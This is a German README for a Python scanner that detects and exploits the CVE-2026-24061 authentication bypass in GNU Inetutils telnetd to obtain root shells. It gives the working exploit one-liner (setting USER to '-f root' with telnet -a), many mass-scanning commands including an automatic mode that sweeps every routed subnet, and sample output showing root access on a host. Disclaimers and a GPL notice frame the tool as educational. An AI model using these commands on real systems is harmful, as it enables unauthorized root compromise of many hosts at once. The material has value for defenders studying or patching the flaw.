
Python-basierter Scanner, der die CVE-2026-24061 telnetd-Authentifizierungsumgehung erkennt und ausnutzt und so Root-Shell-Zugriff auf verwundbare GNU-Inetutils-Dienste ermöglicht.
Ein Python-basierter Scanner zur Erkennung und Ausnutzung der Schwachstelle CVE-2026-24061 in GNU-Inetutils-telnetd-Diensten. Dieses Tool scannt IP-Adressen oder Netzwerke nach verwundbaren telnetd-Diensten, die eine Authentifizierungsumgehung ermöglichen, die zu Root-Shell-Zugriff führt.
DIESE SOFTWARE WIRD AUSSCHLIESSLICH FÜR BILDUNGSZWECKE UND AUTORISIERTE SICHERHEITSTESTS BEREITGESTELLT.
Diese Anwendung wurde ausschließlich zu Bildungszwecken entwickelt, um Sicherheitslücken zu demonstrieren und bei autorisierten Sicherheitstests und Forschungsarbeiten zu helfen.
DIESE SOFTWARE WIRD "WIE BESEHEN" OHNE JEGLICHE GEWÄHRLEISTUNG, AUSDRÜCKLICH ODER STILLSCHWEIGEND, BEREITGESTELLT, EINSCHLIESSLICH, ABER NICHT BESCHRÄNKT AUF DIE GEWÄHRLEISTUNG DER MARKTGÄNGIGKEIT, DER EIGNUNG FÜR EINEN BESTIMMTEN ZWECK UND DER NICHTVERLETZUNG VON RECHTEN DRITTER. DIE AUTOREN UND MITWIRKENDEN GARANTIEREN NICHT, DASS DIE SOFTWARE FEHLERFREI, SICHER ODER FUNKTIONSFÄHIG IST. Die Software kann Fehler, Bugs oder andere Defekte enthalten.
DIE GESAMTE VERANTWORTUNG UND HAFTUNG FÜR DIE NUTZUNG DIESER SOFTWARE LIEGT VOLLSTÄNDIG BEIM BENUTZER. Die Autoren, Mitwirkenden und Vertreiber dieser Software haften nicht für Schäden, Verluste oder rechtliche Konsequenzen, die aus der Nutzung, dem Missbrauch oder der Unfähigkeit zur Nutzung dieser Software entstehen.
Dieses Tool darf NUR auf Systemen verwendet werden, die Ihnen gehören oder für die Sie eine ausdrückliche schriftliche Genehmigung zum Testen haben. Unbefugter Zugriff auf Computersysteme ist illegal und kann zu strafrechtlicher Verfolgung führen.
Die Autoren garantieren NICHT:
Durch die Nutzung dieser Software bestätigen Sie, dass Sie diese Bedingungen gelesen, verstanden haben und ihnen zustimmen. Wenn Sie nicht zustimmen, verwenden Sie diese Software nicht.
Entwickelt von: Cuma KURT
E-Mail: [email protected]
LinkedIn: https://www.linkedin.com/in/cuma-kurt-34414917/
CVE-2026-24061: GNU-Inetutils-telnetd bis einschließlich Version 2.7 ermöglicht eine Remote-Authentifizierungsumgehung über einen -f root-Wert für die Umgebungsvariable USER.
CVSS-Score: 9.8 (Kritisch)
Referenz: NVD CVE-2026-24061
telnet-Client (normalerweise vorinstalliert auf Linux/macOS)pip3 install -r requirements.txt
Hinweis: Die meisten Abhängigkeiten sind Teil der Python-Standardbibliothek. Das Tool funktioniert sofort mit Python 3.6+.
# Einzelne IP-Adresse scannen
python3 tscan.py 192.168.1.1
# CIDR-Netzwerk scannen
python3 tscan.py 192.168.1.0/24
# Mit benutzerdefiniertem Port scannen
python3 tscan.py -p 2323 192.168.1.1
# Ziele aus einer Datei scannen
python3 tscan.py targets.txt
# Mehrere IP-Adressen scannen
python3 tscan.py 192.168.1.1 10.0.0.1 172.16.0.1
# Mehrere CIDR-Netzwerke scannen
python3 tscan.py 192.168.1.0/24 10.0.0.0/16
# Thread-Anzahl für schnelleres Scannen erhöhen (100 Threads)
python3 tscan.py -t 100 192.168.1.0/24
# Timeout für langsame Netzwerke erhöhen
python3 tscan.py --timeout 10 192.168.1.0/24
# Beides für große Netzwerk-Scans kombinieren
python3 tscan.py -t 200 --timeout 8 10.0.0.0/16
# Alle Subnetze aus der System-Routing-Tabelle automatisch erkennen und scannen
python3 tscan.py --auto
# oder Kurzform:
python3 tscan.py -a
# Automatische Erkennung mit benutzerdefiniertem Port
python3 tscan.py --auto -p 2323
# oder:
python3 tscan.py -a -p 2323
# Automatische Erkennung mit hoher Thread-Anzahl
python3 tscan.py --auto -t 200
# oder:
python3 tscan.py -a -t 200
Hinweis: Der --auto-Modus liest die System-Routing-Tabelle mit dem Befehl ip route list oder route -n und scannt automatisch alle erkannten Subnetze.
# Beispiel 1: Schneller Scan des lokalen Netzwerks
python3 tscan.py 192.168.1.0/24
# Beispiel 2: Schneller Scan mit hoher Parallelität
python3 tscan.py -t 300 --timeout 3 10.0.0.0/16
# Beispiel 3: Nicht standardmäßigen Telnet-Port scannen
python3 tscan.py -p 2323 192.168.1.0/24
# Beispiel 4: Alle lokalen Netzwerk-Subnetze automatisch erkennen und scannen
python3 tscan.py --auto
# oder:
python3 tscan.py -a
# Beispiel 5: Automatische Erkennung mit benutzerdefinierten Einstellungen
python3 tscan.py --auto -p 2323 -t 100 --timeout 8
# oder:
python3 tscan.py -a -p 2323 -t 100 --timeout 8
positional arguments:
targets IP-Adresse(n), CIDR-Netzwerk(e) oder Dateipfad(e) mit Zielen
options:
-h, --help Diese Hilfemeldung anzeigen und beenden
-p, --port PORT Zu scannender Telnet-Port (Standard: 23)
-t, --threads THREADS Anzahl der gleichzeitigen Threads (Standard: 50)
--timeout TIMEOUT Verbindungs-Timeout in Sekunden (Standard: 5)
-v, --verbose Ausführliche Ausgabe
-a, --auto Alle Subnetze aus der System-Routing-Tabelle automatisch erkennen und scannen (route -n oder ip route list)
Erstellen Sie eine Textdatei mit einem Ziel pro Zeile:
192.168.1.1
192.168.1.0/24
10.0.0.1
172.16.0.0/16
Zeilen, die mit # beginnen, werden als Kommentare behandelt und ignoriert.
Das Tool bietet:
Echtzeit-Fortschritt: Zeigt Ergebnisse, sobald sie entdeckt werden
[!] - Verwundbarer Host[~] - Port offen, aber nicht verwundbarZusammenfassungsbericht: Enthält:
[*] Starte Scan von 256 Ziel(en)...
[*] Port: 23, Threads: 50, Timeout: 5s
[*] Fortschritt: [████████████████░░░░░░░░░░░░░░░░░░░░] 40.0% (102/256) | Offen: 2 | Verwundbar: 1
[!] 192.168.1.100:23 - VERWUNDBAR
[*] Fortschritt: [████████████████████████████████████] 100.0% (256/256) | Offen: 3 | Verwundbar: 1
[+] Scan abgeschlossen: 256/256 Ziele gescannt
======================================================================
Zusammenfassung der Scan-Ergebnisse
======================================================================
Telnet-Dienste gefunden: 3
Verwundbare Hosts: 1
[!] VERWUNDBARE HOSTS:
● 192.168.1.100:23
Ausgabe: uid=0(root) gid=0(root) groups=0(root)...
[~] Telnet-Dienste gefunden, aber nicht verwundbar:
● 192.168.1.101:23
● 192.168.1.102:23
[*] Scan in 12.34 Sekunden abgeschlossen
USER="-f root"telnet -aDie Schwachstelle ermöglicht eine Authentifizierungsumgehung, indem die Umgebungsvariable USER auf -f root gesetzt wird:
USER="-f root" telnet -a TARGET_IP [PORT]
Dies führt dazu, dass telnetd die USER-Variable als Flag interpretiert, die Authentifizierung umgeht und Root-Zugriff gewährt.
telnet-Clientip route list oder route -nTelnet-Client installieren:
# Debian/Ubuntu
sudo apt-get install telnet
# CentOS/RHEL
sudo yum install telnet
# macOS
# Normalerweise vorinstalliert
--timeout 10Dieses Tool ist bestimmt für:
Verwenden Sie dieses Tool NICHT für:
Dieses Programm ist freie Software: Sie können es unter den Bedingungen der GNU General Public License, wie von der Free Software Foundation veröffentlicht, entweder Version 3 der Lizenz oder (nach Ihrer Wahl) jeder späteren Version, weiterverbreiten und/oder modifizieren.
Dieses Programm wird in der Hoffnung verbreitet, dass es nützlich sein wird, aber OHNE JEGLICHE GEWÄHRLEISTUNG; ohne die stillschweigende Gewährleistung der MARKTGÄNGIGKEIT oder EIGNUNG FÜR EINEN BESTIMMTEN ZWECK. Weitere Details finden Sie in der GNU General Public License.
Sie sollten eine Kopie der GNU General Public License zusammen mit diesem Programm erhalten haben. Falls nicht, siehe https://www.gnu.org/licenses/.
Siehe LICENSE-Datei für den vollständigen Text der GNU General Public License v3.0.
DIE AUTOREN UND MITWIRKENDEN SIND NICHT VERANTWORTLICH FÜR MISSBRAUCH ODER SCHÄDEN, DIE DURCH DIESES TOOL VERURSACHT WERDEN.
Dieses Tool wird AUSSCHLIESSLICH FÜR BILDUNGSZWECKE UND AUTORISIERTE SICHERHEITSTESTS BEREITGESTELLT.
NUTZUNG AUF EIGENES RISIKO. Die gesamte Verantwortung und Haftung für die Nutzung dieser Software liegt vollständig beim Benutzer. Die Autoren garantieren nicht die Genauigkeit, Sicherheit oder Funktionalität dieser Software. Die Software wird "WIE BESEHEN" ohne jegliche Gewährleistung bereitgestellt.
Diese Anwendung wurde ausschließlich zu Bildungszwecken entwickelt. Durch die Nutzung dieser Software bestätigen Sie, dass:
Wenn Sie diesen Bedingungen nicht zustimmen, VERWENDEN SIE DIESE SOFTWARE NICHT.